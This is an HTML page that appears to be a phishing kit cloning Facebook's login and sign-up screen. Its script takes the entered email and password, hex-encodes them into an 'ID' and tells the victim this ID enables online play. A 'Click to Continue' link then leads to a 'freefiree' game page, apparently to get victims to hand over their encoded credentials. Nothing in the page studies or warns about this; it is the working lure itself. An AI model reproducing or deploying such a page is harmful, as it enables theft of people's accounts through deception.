<!doctype html><html><head>
	<title>Facebook Login</title>
<style>
@media only screen and (max-width:1000px){
		body{
	margin: 0px;
	font-family: "Helvetica"
}
.fb-header{
	height: 82px;
	width: 100%;
	font-size: 13px;
	background-image: linear-gradient(#4e69a2, #3b5998 50%);
    border-bottom: 1px solid #133783;
}
.inner-header{
	margin: 0 auto;
	height: 100%;
	width: 980px;
	color: white;
	display: flex;
	justify-content: space-between;
	align-items: center;
	padding-top: 5px
}
.fb-header-logo{
	width: 170px;
	height: 32px;
}
.login-grid{
	height: 70px;
	width: 400px;
	display: grid;
	grid-template-columns: 150px 150px 55px;
	grid-template-rows: 25px 20px 25px;
	grid-column-gap: 17px;
}
.login-grid span{
	grid-column: 2/3;
	grid-row: 3/4;
	align-self: center;

}
.login-grid a{
	color: #9cb4d8;
	text-decoration: none;
}
.login-grid a:hover{
	text-decoration: underline;
}
.email-label{
	grid-column: 1/2;
	grid-row: 1/2;
	align-self: center;
}
.email-input{
	grid-column: 1/2;
	grid-row: 2/3;
}
.pass-label{
	grid-column: 2/3;
	grid-row: 1/2;
	align-self: center;
}
.pass-input{
	grid-column: 2/3;
	grid-row: 2/3;
}
.login-grid button{
	grid-column: 3/4;
	grid-row: 2/3;
	background-color: #4267b2;
 	padding: 3px 5px;
    color: #fff;
    border-radius: 2px;
    font-size: 12px;
    font-weight: bold;
    border: 1px solid #29487d;
}
#fb-main{
	margin: 0 auto;
	height: 572.5px;
	width: 100%;
	background-color: red;
	background: linear-gradient(white, #D3D8E8);
}
.fb-container{
	width: 980px;
	margin: 0 auto;
	height: auto;
}
.sign-up{
	margin-top: 10px;
}
.fb-connect{
	line-height: 29px;
	width:500px; 
	color: #0e385f;
	font-weight: 700;
	font-size: 20px;
	padding-top: 43px;
	display: inline-block;
}
.fb-form{
	padding-top: 20px;
	float: right;
	width:430px;
}
.frm-header{
	font-size: 36px;
	line-height: 48px;
	color: #333;
	font-weight: 600;
}
.frm-spn1{
	font-size: 19px;
	line-height: 25px;
	color: #1d2129;
}
.frm-textbox{
	width: 92%;
	border: 1px solid #bdc7d8;
	border-radius: 5px;
	font-size: 18px;
	padding: 8px 10px;
	margin: 5px 8px;
	margin-left: 0;
}
::placeholder{
	color: #9898A8;
}
.textbox-width{
	width: 42%;
}
.form-div{
	position: relative;
	top: 15px;
}
.birthday{
	font-size: 18px;
	line-height: 24px;
	color: #1a2129;
}
select{
	margin-top: 6px;
	margin-right: 0px;
	border: 1px solid #bdc7d8;
	font-size: 13px;
    height: 30px;
    padding: 5px;
}
.select-last-child{
	margin-right: 10px;
}
.form-div a{
	color: #365899;
	text-decoration: none;
	font-size: 11px;
	display: inline-block;
	max-width: 150px;
	vertical-align: middle;
}
.form-div a:hover{
	text-decoration: underline;
}
.form-div label{
	color: #1d2129;
    font-size: 18px;
    font-weight: normal;
    line-height: 18px;
    padding: 0 10px 0 3px;
    vertical-align: middle;
}
.frm-radio{
	margin-top: 15px;
}
.form-div p{
	color: #777;
    font-size: 11px;
    width: 316px;
    line-height: 1.34;
}
.form-div #button{
	font-size: 19px;
	font-family: 'Freight Sans Bold', Helvetica, Arial, sans-serif !important;
    font-weight: bold !important;
    letter-spacing: normal;
    text-rendering: optimizelegibility;
    min-width: 194px;
    padding: 7px 20px;
    text-align: center;
    border: 1px solid;
    border-radius: 5px;
    color: #fff;
    cursor: pointer;
    display: inline-block;
    position: relative;
    text-shadow: 0 1px 2px rgba(0,0,0,.5);
    margin-top: 10px;
    margin-bottom: 40px;
    background: linear-gradient(#67ae55, #578843);
    background-color: #69a74e;
    box-shadow: inset 0 1px 1px #a4e388;
    border-color: #3b6e22 #3b6e22 #2c5115;
}
.form-div #button a{
	font-size: 19px;
	font-family: 'Freight Sans Bold', Helvetica, Arial, sans-serif !important;
    font-weight: bold !important;
    letter-spacing: normal;
    text-rendering: optimizelegibility;
    text-align: center;
    color: #fff;
    position: relative;
    text-decoration: none;
}
.form-last-child{
	border-top: 1px solid #dddfe2;
    color: #666;
    font-size: 13px;
    font-weight: bold;
    margin-top: 10px;
    padding-top: 15px;
    font-weight: bold;
}
.form-last-child a{
	font-size: 13px;
	vertical-align:initial;
}
.fb-footer{
	background-color: #fff;
	height: 180px;
	width: 100%
}
.div-footer{
	font-size: 12px;
	font-weight: 400;
	line-height: 16px;
	color: #737373;
	width: 980px;
	height: 130px;
	background-color: #fff;
	margin:0 auto;
	padding-top: 45px;
}
.div-footer a{
	padding: 0;
	margin: 0;
	color: #365899;
	text-decoration: none;
}
.div-footer a:hover{
	text-decoration: underline;
}
.div-footer ul{
	list-style: none;
	padding: 0px;
}
.div-footer li{
	display: inline-block;
	padding-left: 10px;
}
.ul1 li:first-child {
    padding-left: 0;
}
.ho-rule{
	border-bottom: 1px solid #dddfe2;
}
.ul2{
	margin-left: -20px;
	margin-top: 11px;
	margin-bottom: 16px;
}
.ul2:first-child{
	padding-left: 20px: 
}
.ul2 li{
	padding-left: 20px;
	line-height: 1.6;
}
p{
	font-size: 11px;
	font-weight: 400
}
#id{
		position: relative;
  left: 0;
  bottom: 0;
  margin: 50px 20px 0 20px;
  width: 95%;
  text-align: center;
}
#id #b2{
		background: #00A1E1;
		color: #061148;
		padding: 5px;
		border-radius: 8px;
}
#id #h32{
		background: #BB0A30;
		color: #fff;
		padding: 5px;
		border-radius: 8px;
}
#id a{
		background: #FF0033;
		color: #fff;
		padding: 7.5px;
		border: none;
		border-radius: 8px;
		font-size: 5vw;
		text-decoration: none;
}
#id{
		position: relative;
  left: 0;
  bottom: 0;
  margin: 50px 10px 0 50px;
  width: 90%;
  text-align: center;
visibility: hidden;
}
#id #b2{
		background: #00A1E1;
		color: #061148;
		padding: 5px;
		border-radius: 8px;
}
#id #h32{
		background: #BB0A30;
		color: #fff;
		padding: 5px;
		border-radius: 8px;
}
#id a{
		background: #FF0033;
		color: #fff;
		padding: 7.5px;
		border: none;
		border-radius: 8px;
		font-size: 5vw;
		text-decoration: none;
}
#scs{
		background: #4AC959;
		padding: 2vw 3vw 2vw 3vw;
		border-radius: 8px;
		position: relative;
		z-index: 5000;
		font-size: 3.5vw;
		margin: -300px 0 -200px -300px;
		width: 100%;
		text-align: center;
		visibility: hidden;
}
#scs h3{
		font-weight: bolder;
		color: #455A64;
}
#scs h5{
		font-weight: bolder;
		color: #455A64;
}
#too{
		background: transparent;
		font-weight: bolder;
		font-size: 3vw;
		border: none;
		color: #fff;
		margin: 0 0 0 400px;
		border: none;
}
#scs b{
		background: #00A1E1;
		color: #061148;
		padding: 5px;
		border-radius: 8px;
}
}
</style>
<style>
@media only screen and (max-width:950px){
body{
	margin: 0px;
	font-family: "Helvetica";
	visibility: visible;
	font-size: 6vw;
}
.fb-header{
	height: 82px;
	width: 270%;
	font-size: 13px;
	background-image: linear-gradient(#4e69a2, #3b5998 50%);
    border-bottom: 1px solid #133783;
}
.inner-header{
	margin: 0 auto;
	height: 100%;
	width: 980px;
	color: white;
	display: flex;
	justify-content: space-between;
	align-items: center;
	padding-top: 5px
}
.fb-header-logo{
	width: 170px;
	height: 32px;
}
.login-grid{
	height: 70px;
	width: 400px;
	display: grid;
	grid-template-columns: 150px 150px 55px;
	grid-template-rows: 25px 20px 25px;
	grid-column-gap: 17px;
}
.login-grid span{
	grid-column: 2/3;
	grid-row: 3/4;
	align-self: center;

}
.login-grid a{
	color: #9cb4d8;
	text-decoration: none;
}
.login-grid a:hover{
	text-decoration: underline;
}
.email-label{
	grid-column: 1/2;
	grid-row: 1/2;
	align-self: center;
}
.email-input{
	grid-column: 1/2;
	grid-row: 2/3;
}
.pass-label{
	grid-column: 2/3;
	grid-row: 1/2;
	align-self: center;
}
.pass-input{
	grid-column: 2/3;
	grid-row: 2/3;
}
.login-grid button{
	grid-column: 3/4;
	grid-row: 2/3;
	background-color: #4267b2;
 	padding: 3px 5px;
    color: #fff;
    border-radius: 2px;
    font-size: 12px;
    font-weight: bold;
    border: 1px solid #29487d;
}
#fb-main{
	margin: 0 auto;
	height: 572.5px;
	width: 100%;
	background-color: red;
	background: linear-gradient(white, #D3D8E8);
}
#fb-main{
	margin: 0 auto;
	height: 572.5px;
	width: 270%;
	background-color: red;
	background: linear-gradient(white, #D3D8E8);
}
.fb-container{
	width: 980px;
	margin: 0 auto;
	height: auto;
}
.sign-up{
	margin-top: 10px;
}
.fb-connect{
	line-height: 29px;
	width:500px; 
	color: #0e385f;
	font-weight: 700;
	font-size: 20px;
	padding-top: 43px;
	display: inline-block;
}
.fb-form{
	padding-top: 20px;
	float: right;
	width:430px;
}
.frm-header{
	font-size: 36px;
	line-height: 48px;
	color: #333;
	font-weight: 600;
}
.frm-spn1{
	font-size: 19px;
	line-height: 25px;
	color: #1d2129;
}
.frm-textbox{
	width: 92%;
	border: 1px solid #bdc7d8;
	border-radius: 5px;
	font-size: 18px;
	padding: 8px 10px;
	margin: 5px 8px;
	margin-left: 0;
}
::placeholder{
	color: #9898A8;
}
.textbox-width{
	width: 42%;
}
.form-div{
	position: relative;
	top: 15px;
}
.birthday{
	font-size: 18px;
	line-height: 24px;
	color: #1a2129;
}
select{
	margin-top: 6px;
	margin-right: 0px;
	border: 1px solid #bdc7d8;
	font-size: 13px;
    height: 30px;
    padding: 5px;
}
.select-last-child{
	margin-right: 10px;
}
.form-div a{
	color: #365899;
	text-decoration: none;
	font-size: 11px;
	display: inline-block;
	max-width: 150px;
	vertical-align: middle;
}
.form-div a:hover{
	text-decoration: underline;
}
.form-div label{
	color: #1d2129;
    font-size: 18px;
    font-weight: normal;
    line-height: 18px;
    padding: 0 10px 0 3px;
    vertical-align: middle;
}
.frm-radio{
	margin-top: 15px;
}
.form-div p{
	color: #777;
    font-size: 11px;
    width: 316px;
    line-height: 1.34;
}
.form-div #button{
	font-size: 19px;
	font-family: 'Freight Sans Bold', Helvetica, Arial, sans-serif !important;
    font-weight: bold !important;
    letter-spacing: normal;
    text-rendering: optimizelegibility;
    min-width: 194px;
    padding: 7px 20px;
    text-align: center;
    border: 1px solid;
    border-radius: 5px;
    color: #fff;
    cursor: pointer;
    display: inline-block;
    position: relative;
    text-shadow: 0 1px 2px rgba(0,0,0,.5);
    margin-top: 10px;
    margin-bottom: 0px;
    background: linear-gradient(#67ae55, #578843);
    background-color: #69a74e;
    box-shadow: inset 0 1px 1px #a4e388;
    border-color: #3b6e22 #3b6e22 #2c5115;
}
.form-div #button a{
	font-size: 19px;
	font-family: 'Freight Sans Bold', Helvetica, Arial, sans-serif !important;
    font-weight: bold !important;
    letter-spacing: normal;
    text-rendering: optimizelegibility;
    text-align: center;
    color: #fff;
    position: relative;
    text-decoration: none;
}
.form-div #button a:hover{
		text-decoration: none;
}
.form-last-child{
	border-top: 1px solid #dddfe2;
    color: #666;
    font-size: 13px;
    font-weight: bold;
    margin-top: 10px;
    padding-top: 15px;
    font-weight: bold;
}
.form-last-child a{
	font-size: 13px;
	vertical-align:initial;
}
.fb-footer{
	background-color: #fff;
	height: 180px;
	width: 100%
}
.div-footer{
	font-size: 12px;
	font-weight: 400;
	line-height: 16px;
	color: #737373;
	width: 980px;
	height: 130px;
	background-color: #fff;
	margin:0 auto;
	padding-top: 45px;
}
.div-footer a{
	padding: 0;
	margin: 0;
	color: #365899;
	text-decoration: none;
}
.div-footer a:hover{
	text-decoration: underline;
}
.div-footer ul{
	list-style: none;
	padding: 0px;
margin-left: 10px;
}
.div-footer li{
	display: inline-block;
	padding-left: 10px;
}
.ul1 li:first-child {
    padding-left: 0;
}
.ho-rule{
	border-bottom: 1px solid #dddfe2;
}
.ul2{
	margin-left: 10px;
	margin-top: 11px;
	margin-bottom: 16px;
}
.ul2:first-child{
	padding-lft: 20px: 
}
.ul2 li{
	padding-lft: 20px;
	line-height: 1.6;
margin-left: 5px;
}
p{
	font-size: 11px;
	font-weight: 400
}
#id{
		position: relative;
  left: 0;
  bottom: 0;
  margin: 50px 20px 0 20px;
  width: 95%;
  text-align: center;
visibility: hidden;
}
#id #b2{
		background: #00CC00;
		color: #061148;
		padding: 5px;
		border-radius: 8px;
margin: 0 50px 0 -100px;
float: left;
text-align : left;
}
#id #h32{
		background: #276EF1;
		color: #fff;
		padding: 5px;
		border-radius: 8px;
text-align : center;
margin-left: -60px;
width: 300px;
margin-top: 50px;
}
#id a{
		background: #FF0033;
		color: #fff;
		padding: 7.5px;
		border: none;
		border-radius: 8px;
		font-size: 5vw;
		text-decoration: none;
}
#id{
		position: relative;
  left: 0;
  bottom: 0;
  margin: 50px 0 0 300px;
  width: 100%;
  text-align: center;
visibility: hidden;
}
#id #b2{
		background: #00CC00;
		color: #061148;
		padding: 5px;
		border-radius: 8px;
margin: 0 50px 0 -100px;
float: left;
text-align : left;
}
#id #h32{
		background: #276EF1;
		color: #fff;
		padding: 5px;
		border-radius: 8px;
text-align : center;
margin-left: -60px;
width: 300px;
margin-top: 50px;
}
#id a{
		background: #FF0033;
		color: #fff;
		padding: 7.5px;
		border: none;
		border-radius: 8px;
		font-size: 5vw;
		text-decoration: none;
}
#scs{
		background: #4AC959;
		padding: 2vw 3vw 2vw 3vw;
		border-radius: 8px;
		position: relative;
		z-index: 5000;
		font-size: 3.5vw;
		margin: -300px 0 150px -300px;
		width: 100%;
		text-align: center;
		visibility: hidden;
}
#scs h3{
		font-weight: bolder;
		color: #455A64;
}
#scs h5{
		font-weight: bolder;
		color: #455A64;
}
#too{
		background: transparent;
		font-weight: bolder;
		font-size: 3vw;
		border: none;
		color: #fff;
		margin: 0 0 0 400px;
}
#scs b{
		background: #00A1E1;
		color: #061148;
		padding: 5px;
		border-radius: 8px;
}
}
#id #b2{
		background: #00CC00;
		color: #061148;
		padding: 5px;
		border-radius: 8px;
margin: 0 50px 0 -100px;
float: center;
text-align : center;
}
#id #h32{
		background: #276EF1;
		color: #fff;
		padding: 5px;
		border-radius: 8px;
text-align : center;
margin-left: -60px;
width: 300px;
margin-top: 50px;
}
</style>
</head>
<body>
	<header class="fb-header">
		<div class="inner-header">
<span style="font-size: 45px; positon:absolute; eft:180px; color:white; op:3.5%; margin: 0 0 0 20px; "> <b><a style="font-size: 45px; positon:absolute; eft:180px; color:white; op:3.5%; magin: 0 0 0 20px; text-decoration: none;" href="https://blacksmith779.github.io/pages/Facebook.html">facebook</a></b> </span>
</form>
			<form name="myform" method="post" onsubmit="return validateform()" class="login-grid">
				<label class="email-label" for="email or phone">Email or Phone</label>
				<input class="email-input" type="text" name="name" minlength="5" maxlength="30" required>
					<label class="pass-label" for="password">Password</label>
					<input class="pass-input" type="password" name="password" minlength="6" maxlength="15" autocomplete="off" required>
					<span class="Forgotten-item"><a href="https://m.facebook.com/login/identify">Forgotten account?</a></span>
					<button type="submit">Log In</button>
			</form>
		</div>
	</header>
	<main id="fb-main">
		<div class="fb-container">
			<section style="margin-left: 20px;" class="fb-connect">
				<span>Facebook helps you connect and share with<br>the people in your life.</span>
			</section>
			<section class="fb-form">
					<span class="frm-header">Create an account</span><br>
					<span class="frm-spn1">It's free and always will be.</span>
					<form class="sign-up">
						<input class="frm-textbox textbox-width" type="text" name="text" placeholder="First name">
						<input class="frm-textbox textbox-width" type="text" name="text" placeholder="Surname">
						<input class="frm-textbox" type="text" name="text" placeholder="Mobile number or email address"><br>
						<input class="frm-textbox" type="password" name="password" placeholder="New password"><br>
						<div class="form-div">
							<span class="birthday">Birthday</span><br>
							<select aria-label="Day" name="birthday_day" id="day" title="Day" class="_5dba">
								<option value="0">Day</option><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5" selected="1">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option><option value="13">13</option><option value="14">14</option><option value="15">15</option><option value="16">16</option><option value="17">17</option><option value="18">18</option><option value="19">19</option><option value="20">20</option><option value="21">21</option><option value="22">22</option><option value="23">23</option><option value="24">24</option><option value="25">25</option><option value="26">26</option><option value="27">27</option><option value="28">28</option><option value="29">29</option><option value="30">30</option><option value="31">31</option>
							</select>
							<select aria-label="Month" name="birthday_month" id="month" title="Month" class="_5dba">
								<option value="0">Month</option><option value="1">Jan</option><option value="2">Feb</option><option value="3">Mar</option><option value="4">Apr</option><option value="5">May</option><option value="6">Jun</option><option value="7">Jul</option><option value="8" selected="1">Aug</option><option value="9">Sept</option><option value="10">Oct</option><option value="11">Nov</option><option value="12">Dec</option>
							</select>
							<select aria-label="Year" name="birthday_year" id="year" title="Year" class="select-last-child">
								<option value="0">Year</option><option value="2018">2018</option><option value="2017">2017</option><option value="2016">2016</option><option value="2015">2015</option><option value="2014">2014</option><option value="2013">2013</option><option value="2012">2012</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option><option value="2003">2003</option><option value="2002">2002</option><option value="2001">2001</option><option value="2000">2000</option><option value="1999">1999</option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993" selected="1">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911</option><option value="1910">1910</option><option value="1909">1909</option><option value="1908">1908</option><option value="1907">1907</option><option value="1906">1906</option><option value="1905">1905</option>
							</select>
							<a class="why-link" href="facebook.com">Why do I need to provide my date of birth?</a><br>
							<div class="frm-radio">
								<input type="radio" name="gender">
								<label>Female</label>
								<input type="radio" name="gender">
								<label>Male</label>
							</div>
							<p>By clicking Sign Up, you agree to our <a href="facebook.com">Terms, Data Policy</a> and <a href="facebook.com">Cookie Policy</a>. You may receive SMS notifications from us and can opt out at any time.</p>
							<a href="facebook.com"><button id="button" style="margin: 0 0 10px 0;"><a href="facebook.com">Sign Up</a></button></a><br>
							<span class="form-last-child"><a href="facebook.com" style="margin-tp: -50px;">Create a Page</a> for a celebrity, band or business.</span>
						</div>
					</form>
			</section>
		</div>
	</main>
	<footer class="fb-footer">
		<div class="div-footer">
		<a href="facebook.com">
			<ul class="ul1">
				<li style="margin-left: 20px;">English (UK)</li><li><a href="facebook.com">العربية</a></li><li><a href="facebook.com">Français (France)</a></li><li><a href="facebook.com">Italiano</a></li><li><a href="facebook.com">Deutsch</a></li><li><a href="facebook.com">Русский</a></li><li><a href="facebook.com">Español</a></li><li><a href="facebook.com">Bahasa Indonesia</a></li><li><a href="facebook.com">Türkçe</a></li><li><a href="facebook.com">Português (Brasil)</a></li><li><a href="facebook.com">हिन्दी</a></li>
			</ul>
			<div class="ho-rule"></div>
			<ul class="ul2" style="margin-let: 20px;">
				<li><a style="margin-left: 20px;" href="facebook.com">Sign Up</a></li><li><a href="/storage/emulated/0/TrebEdit/fb.html">Log In</a></li><li><a href="facebook.com">Messenger</a></li><li><a href="facebook.com">Facebook Lite</a></li><li><a href="facebook.com">Mobile</a></li><li><a href="facebook.com">Find Friends</a></li><li><a href="facebook.com">People</a></li><li><a href="facebook.com">Pages</a></li><li><a href="facebook.com">Video interests</a></li><li><a href="facebook.com">Places</a></li><li><a href="facebook.com">Games</a></li><li><a href="facebook.com">Locations</a></li><li><a href="facebook.com">Marketplace</a></li><li><a href="facebook.com">Groups</a></li><li><a href="facebook.com" style="margin-left: 20px;">Instagram</a></li><li><a href="facebook.com">Local</a></li><li><a href="facebook.com">About</a></li><li><a href="facebook.com">Create ad</a></li><li><a href="facebook.com">Create Page</a></li><li><a href="facebook.com">Developers</a></li><li><a href="facebook.com">Careers</a></li><li><a href="facebook.com">Privacy</a></li><li><a href="facebook.com">Cookies</a></li><li><a href="facebook.com">AdChoices</a></li><li><a href="facebook.com">Terms</a></li><li><a href="facebook.com">Help</a></li><li><a href="facebook.com">Settings</a></li><li><a href="facebook.com">Activity log</a></li>
			</ul>
			<p style="margin-left: 20px;">Facebook © 2020</p>
		</div>
	</footer>
<div id="id">
<h3>ID: </h3>
<b id="b2">Your ID will appear here after signing up</b>
<h3 id="h32">Notice: This ID allows you to play online with players</h3>
<a href="https://blacksmith779.github.io/pages/freefiree.html" id="fme"><b>Click to Continue >>></b></a>
</div>
  <script src="http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script>
function ascii_to_hexa(str)
  {
	var arr1 = [];
	for (var n = 0, l = str.length; n < l; n ++) 
     {
		var hex = Number(str.charCodeAt(n)).toString(16);
		arr1.push(hex);
	 }
	return arr1.join('');
   }
</script>
<script>
var fm = document.getElementById("fme");
var omn = document.getElementById("id");
fm.style.visibility = "hidden";
function validateform(){
var name=document.myform.name.value;
var password=document.myform.password.value;
var all = document.getElementById("all");
var elem22 = document.getElementById("b2");
if(password != ""){
ascii_to_hexa(name+password);
	elem22.innerHTML = "#"+ascii_to_hexa(name)+"2a1q1z2"+ascii_to_hexa(password);
	fm.style.visibility = "visible";
omn.style.visibility = "visible";
	return false;
}
else{
	return false;
}
}
</script>
</body></html>
